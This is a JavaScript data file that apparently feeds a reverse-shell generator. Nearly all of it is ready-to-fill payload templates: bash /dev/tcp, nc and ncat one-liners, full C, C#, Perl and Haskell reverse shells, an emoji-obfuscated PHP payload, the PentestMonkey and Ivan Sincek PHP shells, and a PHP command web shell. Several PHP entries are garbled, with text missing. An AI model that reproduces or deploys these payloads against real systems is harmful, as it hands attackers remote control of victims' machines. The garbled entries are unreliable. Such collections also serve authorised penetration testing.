const CommandType = { 'ReverseShell': 'ReverseShell', 'BindShell': 'BindShell', 'MSFVenom': 'MSFVenom' }; const withCommandType = function (commandType, elements) { return elements.map((element) => { return { ...element, meta: [ ...element.meta, commandType ] } }); } const reverseShellCommands = withCommandType( CommandType.ReverseShell, [ { "name": "Bash -i", "command": "{shell} -i >& /dev/tcp/{ip}/{port} 0>&1", "meta": ["linux", "mac"] }, { "name": "Bash 196", "command": "0<&196;exec 196<>/dev/tcp/{ip}/{port}; {shell} <&196 >&196 2>&196", "meta": ["linux", "mac"] }, { "name": "Bash read line", "command": "exec 5<>/dev/tcp/{ip}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done", "meta": ["linux", "mac"] }, { "name": "Bash 5", "command": "{shell} -i 5<> /dev/tcp/{ip}/{port} 0<&5 1>&5 2>&5", "meta": ["linux", "mac"] }, { "name": "Bash udp", "command": "{shell} -i >& /dev/udp/{ip}/{port} 0>&1", "meta": ["linux", "mac"] }, { "name": "nc mkfifo", "command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f", "meta": ["linux", "mac"] }, { "name": "nc -e", "command": "nc -e {shell} {ip} {port}", "meta": ["linux", "mac"] }, { "name": "nc.exe -e", "command": "nc -e {shell} {ip} {port}", "meta": ["windows"] }, { "name": "nc -c", "command": "nc -c {shell} {ip} {port}", "meta": ["linux", "mac"] }, { "name": "ncat -e", "command": "ncat {ip} {port} -e {shell}", "meta": ["linux", "mac"] }, { "name": "ncat.exe -e", "command": "ncat.exe {ip} {port} -e {shell}", "meta": ["windows"] }, { "name": "ncat udp", "command": "ncat {ip} {port} -e {shell}", "meta": ["linux", "mac"] }, { "name": "C", "command": "#include \n#include \n#include \n#include \n#include \n#include \n#include \n\nint main(void){\n int port = {port};\n struct sockaddr_in revsockaddr;\n\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\n revsockaddr.sin_family = AF_INET; \n revsockaddr.sin_port = htons(port);\n revsockaddr.sin_addr.s_addr = inet_addr(\"{ip}\");\n\n connect(sockt, (struct sockaddr *) &revsockaddr, \n sizeof(revsockaddr));\n dup2(sockt, 0);\n dup2(sockt, 1);\n dup2(sockt, 2);\n\n char * const argv[] = {\"{shell}\", NULL};\n execve(\"{shell}\", argv, NULL);\n\n return 0; \n}", "meta": ["linux", "mac"] }, { "name": "C Windows", "command": "#include \r\n#include \r\n#pragma comment(lib,\"ws2_32\")\r\n\r\nWSADATA wsaData;\r\nSOCKET Winsock;\r\nstruct sockaddr_in hax; \r\nchar ip_addr[16] = \"{ip}\"; \r\nchar port[6] = \"{port}\"; \r\n\r\nSTARTUPINFO ini_processo;\r\n\r\nPROCESS_INFORMATION processo_info;\r\n\r\nint main()\r\n{\r\n WSAStartup(MAKEWORD(2, 2), &wsaData);\r\n Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);\r\n\r\n\r\n struct hostent *host; \r\n host = gethostbyname(ip_addr);\r\n strcpy_s(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));\r\n\r\n hax.sin_family = AF_INET;\r\n hax.sin_port = htons(atoi(port));\r\n hax.sin_addr.s_addr = inet_addr(ip_addr);\r\n\r\n WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);\r\n\r\n memset(&ini_processo, 0, sizeof(ini_processo));\r\n ini_processo.cb = sizeof(ini_processo);\r\n ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; \r\n ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;\r\n\r\n TCHAR cmd[255] = TEXT(\"cmd.exe\");\r\n\r\n CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);\r\n\r\n return 0;\r\n}", "meta": ["windows"] }, { "name": "C#", "command": "using System;\nusing System.Text;\nusing System.IO;\nusing System.Diagnostics;\nusing System.ComponentModel;\nusing System.Linq;\nusing System.Net;\nusing System.Net.Sockets;\n\n\nnamespace ConnectBack\n{\n\tpublic class Program\n\t{\n\t\tstatic StreamWriter streamWriter;\n\n\t\tpublic static void Main(string[] args)\n\t\t{\n\t\t\tusing(TcpClient client = new TcpClient(\"{ip}\", {port}))\n\t\t\t{\n\t\t\t\tusing(Stream stream = client.GetStream())\n\t\t\t\t{\n\t\t\t\t\tusing(StreamReader rdr = new StreamReader(stream))\n\t\t\t\t\t{\n\t\t\t\t\t\tstreamWriter = new StreamWriter(stream);\n\t\t\t\t\t\t\n\t\t\t\t\t\tStringBuilder strInput = new StringBuilder();\n\n\t\t\t\t\t\tProcess p = new Process();\n\t\t\t\t\t\tp.StartInfo.FileName = \"cmd.exe\";\n\t\t\t\t\t\tp.StartInfo.CreateNoWindow = true;\n\t\t\t\t\t\tp.StartInfo.UseShellExecute = false;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardOutput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardInput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardError = true;\n\t\t\t\t\t\tp.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);\n\t\t\t\t\t\tp.Start();\n\t\t\t\t\t\tp.BeginOutputReadLine();\n\n\t\t\t\t\t\twhile(true)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tstrInput.Append(rdr.ReadLine());\n\t\t\t\t\t\t\t//strInput.Append(\"\\n\");\n\t\t\t\t\t\t\tp.StandardInput.WriteLine(strInput);\n\t\t\t\t\t\t\tstrInput.Remove(0, strInput.Length);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tprivate static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)\n {\n StringBuilder strOutput = new StringBuilder();\n\n if (!String.IsNullOrEmpty(outLine.Data))\n {\n try\n {\n strOutput.Append(outLine.Data);\n streamWriter.WriteLine(strOutput);\n streamWriter.Flush();\n }\n catch (Exception err) { }\n }\n }\n\n\t}\n}", "meta": ["linux", "windows"] }, { "name": "Haskell #1", "command": "module Main where\n\nimport System.Process\n\nmain = callCommand \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | {shell} -i 2>&1 | nc {ip} {port} >/tmp/f\"", "meta": ["linux", "mac"] }, { "name": "Perl", "command": "perl -e 'use Socket;$i=\"{ip}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"{shell} -i\");};'", "meta": ["linux", "mac"] }, { "name": "Perl no sh", "command": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{ip}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'", "meta": ["linux", "mac"] }, { "name": "PHP Emoji", "command": "php -r '$๐Ÿ˜€=\"1\";$๐Ÿ˜=\"2\";$๐Ÿ˜…=\"3\";$๐Ÿ˜†=\"4\";$๐Ÿ˜‰=\"5\";$๐Ÿ˜Š=\"6\";$๐Ÿ˜Ž=\"7\";$๐Ÿ˜=\"8\";$๐Ÿ˜š=\"9\";$๐Ÿ™‚=\"0\";$๐Ÿคข=\" \";$๐Ÿค“=\"<\";$๐Ÿค =\">\";$๐Ÿ˜ฑ=\"-\";$๐Ÿ˜ต=\"&\";$๐Ÿคฉ=\"i\";$๐Ÿค”=\".\";$๐Ÿคจ=\"/\";$๐Ÿฅฐ=\"a\";$๐Ÿ˜=\"b\";$๐Ÿ˜ถ=\"i\";$๐Ÿ™„=\"h\";$๐Ÿ˜‚=\"c\";$๐Ÿคฃ=\"d\";$๐Ÿ˜ƒ=\"e\";$๐Ÿ˜„=\"f\";$๐Ÿ˜‹=\"k\";$๐Ÿ˜˜=\"n\";$๐Ÿ˜—=\"o\";$๐Ÿ˜™=\"p\";$๐Ÿค—=\"s\";$๐Ÿ˜‘=\"x\";$๐Ÿ’€ = $๐Ÿ˜„. $๐Ÿค—. $๐Ÿ˜—. $๐Ÿ˜‚. $๐Ÿ˜‹. $๐Ÿ˜—. $๐Ÿ˜™. $๐Ÿ˜ƒ. $๐Ÿ˜˜;$๐Ÿš€ = \"{ip}\";$๐Ÿ’ป = {port};$๐Ÿš = \"{shell}\". $๐Ÿคข. $๐Ÿ˜ฑ. $๐Ÿคฉ. $๐Ÿคข. $๐Ÿค“. $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿ˜. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…;$๐Ÿคฃ = $๐Ÿ’€($๐Ÿš€,$๐Ÿ’ป);$๐Ÿ‘ฝ = $๐Ÿ˜ƒ. $๐Ÿ˜‘. $๐Ÿ˜ƒ. $๐Ÿ˜‚;$๐Ÿ‘ฝ($๐Ÿš);'", "meta": ["linux", "mac"] }, { "name": "PHP PentestMonkey", "command": " array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?>", "meta": ["linux", "windows", "mac"] }, { "name": "PHP Ivan Sincek", "command": " array(\'pipe\', \'r\'), // shell can read from STDIN\n 1 => array(\'pipe\', \'w\'), // shell can write to STDOUT\n 2 => array(\'pipe\', \'w\') // shell can write to STDERR\n );\n private $buffer = 1024; // read/write buffer size\n private $clen = 0; // command length\n private $error = false; // stream read/write error\n public function __construct($addr, $port) {\n $this->addr = $addr;\n $this->port = $port;\n }\n private function detect() {\n $detected = true;\n if (stripos(PHP_OS, \'LINUX\') !== false) { // same for macOS\n $this->os = \'LINUX\';\n $this->shell = \'{shell}\';\n } else if (stripos(PHP_OS, \'WIN32\') !== false || stripos(PHP_OS, \'WINNT\') !== false || stripos(PHP_OS, \'WINDOWS\') !== false) {\n $this->os = \'WINDOWS\';\n $this->shell = \'cmd.exe\';\n } else {\n $detected = false;\n echo \"SYS_ERROR: Underlying operating system is not supported, script will now exit...\\n\";\n }\n return $detected;\n }\n private function daemonize() {\n $exit = false;\n if (!function_exists(\'pcntl_fork\')) {\n echo \"DAEMONIZE: pcntl_fork() does not exists, moving on...\\n\";\n } else if (($pid = @pcntl_fork()) < 0) {\n echo \"DAEMONIZE: Cannot fork off the parent process, moving on...\\n\";\n } else if ($pid > 0) {\n $exit = true;\n echo \"DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n\";\n } else if (posix_setsid() < 0) {\n // once daemonized you will actually no longer see the script\'s dump\n echo \"DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n\";\n } else {\n echo \"DAEMONIZE: Completed successfully!\\n\";\n }\n return $exit;\n }\n private function settings() {\n @error_reporting(0);\n @set_time_limit(0); // do not impose the script execution time limit\n @umask(0); // set the file/directory permissions - 666 for files and 777 for directories\n }\n private function dump($data) {\n $data = str_replace(\'<\', \'<\', $data);\n $data = str_replace(\'>\', \'>\', $data);\n echo $data;\n }\n private function read($stream, $name, $buffer) {\n if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream\n $this->error = true; // set global error flag\n echo \"STRM_ERROR: Cannot read from ${name}, script will now exit...\\n\";\n }\n return $data;\n }\n private function write($stream, $name, $data) {\n if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream\n $this->error = true; // set global error flag\n echo \"STRM_ERROR: Cannot write to ${name}, script will now exit...\\n\";\n }\n return $bytes;\n }\n // read/write method for non-blocking streams\n private function rw($input, $output, $iname, $oname) {\n while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {\n if ($this->os === \'WINDOWS\' && $oname === \'STDIN\') { $this->clen += strlen($data); } // calculate the command length\n $this->dump($data); // script\'s dump\n }\n }\n // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)\n // we must read the exact byte length from a stream and not a single byte more\n private function brw($input, $output, $iname, $oname) {\n $fstat = fstat($input);\n $size = $fstat[\'size\'];\n if ($this->os === \'WINDOWS\' && $iname === \'STDOUT\' && $this->clen) {\n // for some reason Windows OS pipes STDIN into STDOUT\n // we do not like that\n // we need to discard the data from the stream\n while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {\n $this->clen -= $bytes;\n $size -= $bytes;\n }\n }\n while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {\n $size -= $bytes;\n $this->dump($data); // script\'s dump\n }\n }\n public function run() {\n if ($this->detect() && !$this->daemonize()) {\n $this->settings();\n\n // ----- SOCKET BEGIN -----\n $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);\n if (!$socket) {\n echo \"SOC_ERROR: {$errno}: {$errstr}\\n\";\n } else {\n stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns \'true\' on Windows OS\n\n // ----- SHELL BEGIN -----\n $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);\n if (!$process) {\n echo \"PROC_ERROR: Cannot start the shell\\n\";\n } else {\n foreach ($pipes as $pipe) {\n stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns \'false\' on Windows OS\n }\n\n // ----- WORK BEGIN -----\n $status = proc_get_status($process);\n @fwrite($socket, \"SOCKET: Shell has connected! PID: \" . $status[\'pid\'] . \"\\n\");\n do {\n\t\t\t\t\t\t$status = proc_get_status($process);\n if (feof($socket)) { // check for end-of-file on SOCKET\n echo \"SOC_ERROR: Shell connection has been terminated\\n\"; break;\n } else if (feof($pipes[1]) || !$status[\'running\']) { // check for end-of-file on STDOUT or if process is still running\n echo \"PROC_ERROR: Shell process has been terminated\\n\"; break; // feof() does not work with blocking streams\n } // use proc_get_status() instead\n $streams = array(\n \'read\' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR\n \'write\' => null,\n \'except\' => null\n );\n $num_changed_streams = @stream_select($streams[\'read\'], $streams[\'write\'], $streams[\'except\'], 0); // wait for stream changes | will not wait on Windows OS\n if ($num_changed_streams === false) {\n echo \"STRM_ERROR: stream_select() failed\\n\"; break;\n } else if ($num_changed_streams > 0) {\n if ($this->os === \'LINUX\') {\n if (in_array($socket , $streams[\'read\'])) { $this->rw($socket , $pipes[0], \'SOCKET\', \'STDIN\' ); } // read from SOCKET and write to STDIN\n if (in_array($pipes[2], $streams[\'read\'])) { $this->rw($pipes[2], $socket , \'STDERR\', \'SOCKET\'); } // read from STDERR and write to SOCKET\n if (in_array($pipes[1], $streams[\'read\'])) { $this->rw($pipes[1], $socket , \'STDOUT\', \'SOCKET\'); } // read from STDOUT and write to SOCKET\n } else if ($this->os === \'WINDOWS\') {\n // order is important\n if (in_array($socket, $streams[\'read\'])/*------*/) { $this->rw ($socket , $pipes[0], \'SOCKET\', \'STDIN\' ); } // read from SOCKET and write to STDIN\n if (($fstat = fstat($pipes[2])) && $fstat[\'size\']) { $this->brw($pipes[2], $socket , \'STDERR\', \'SOCKET\'); } // read from STDERR and write to SOCKET\n if (($fstat = fstat($pipes[1])) && $fstat[\'size\']) { $this->brw($pipes[1], $socket , \'STDOUT\', \'SOCKET\'); } // read from STDOUT and write to SOCKET\n }\n }\n } while (!$this->error);\n // ------ WORK END ------\n\n foreach ($pipes as $pipe) {\n fclose($pipe);\n }\n proc_close($process);\n }\n // ------ SHELL END ------\n\n fclose($socket);\n }\n // ------ SOCKET END ------\n\n }\n }\n}\necho \'
\';\n// change the host address and/or port number as necessary\n$sh = new Shell(\'{ip}\', {port});\n$sh->run();\nunset($sh);\n// garbage collector requires PHP v5.3.0 or greater\n// @gc_collect_cycles();\necho \'
\';\n?>", "meta": ["linux", "windows", "mac"] }, { "name": "PHP cmd", "command": "\n\n
\">\n\n\n<\/form>\n
\n\n<\/pre>\n<\/body>\n